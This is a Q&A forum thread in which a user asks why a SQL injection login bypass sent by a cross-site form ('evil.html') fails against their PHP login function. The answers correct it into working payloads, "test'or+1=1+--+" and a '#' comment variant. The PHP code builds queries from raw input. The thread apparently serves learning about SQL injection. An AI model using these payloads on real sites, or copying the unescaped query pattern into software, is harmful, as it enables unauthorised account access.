0

Background

I've made a html page evil.html whereby when the user clicks on it they should be able to enter a username and click a submit button thereby logging them into the site that I created.

I would expect that the injection 'or 1=1 -- would mean if I submit a user with username test then the SQL query results in

SELECT * FROM users WHERE userid='test' or 1=1 -- AND password='$hash'

which should mean that my user test is authenticated. However it is throwing a 500 where there are + signs where the spacing in the injection are.

My login parameter in the request looks like this:

login: "test'or+1=1+--"

Does anyone have any idea why this exploit is not working?

evil.html

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<script>
  function attack() {
    document.querySelector('#login').value += "'or 1=1 --";
  }
</script>
</head>
<body>
<form action="http://example.com/" onsubmit="attack();" method="POST">
  <input name="login" id="login" value="">
  <button>Submit</button>
</form>
</body>
</html>

login.php

function login($username, $password) {
    $sql = "SELECT * FROM users WHERE userid='$username'";
    $result = $this->db->query($sql);
    $user = $result->next();
    if (!$user) {
        return false;
    }
    $salt = $user['salt'];
    $hash = md5($salt.$password);
    $sql = "SELECT * FROM users WHERE userid='$username' AND password='$hash'";
    $userdata = $this->db->query($sql)->next();
    if ($userdata) {
    // user is logged in
    // doStuff()
    }
}
John Conde
  • 217,595
  • 99
  • 455
  • 496
MichaelOMi3l
  • 1
  • What is the error text? – u_mulder Jul 12 '20 at 19:18
  • @u_mulder Upon further inspection, it looks like the `'` in the injection `' or 1=1 --` is causing the error, though I'm not sure why. As for the error text, it just says `500 Internal Server Error`, theres no response body coming back. – MichaelOMi3l Jul 12 '20 at 19:27
  • Check the server log for details on what is causing the 500 error. – Dave Jul 12 '20 at 20:06

2 Answers2

0

Try adding a space after the double hyphen.

So, from

.value += "'or 1=1 --"; to .value += "'or 1=1 -- ";

Gavin
  • 293
  • 2
  • 4
0

The plus is an URL-encrypted form of a space. So it's perfectly fine at this point (cf. URL encoding the space character: + or %20? ).

In the widely used relational database management systems from Microsoft, Oracle, PostgreSQL and MySQL, a comment can be introduced with --. MySQL is a bit fussy here. It would like to have a space after the -- otherwise it won't recognize it.

So a valid exploit should be:

"test'or+1=1+--+"

You can also try another mySQL notation like '#comment'

"test'or+1=1+#"

Cf. the section "Comments" in https://portswigger.net/web-security/sql-injection/cheat-sheet.

secf00tprint
  • 553
  • 5
  • 15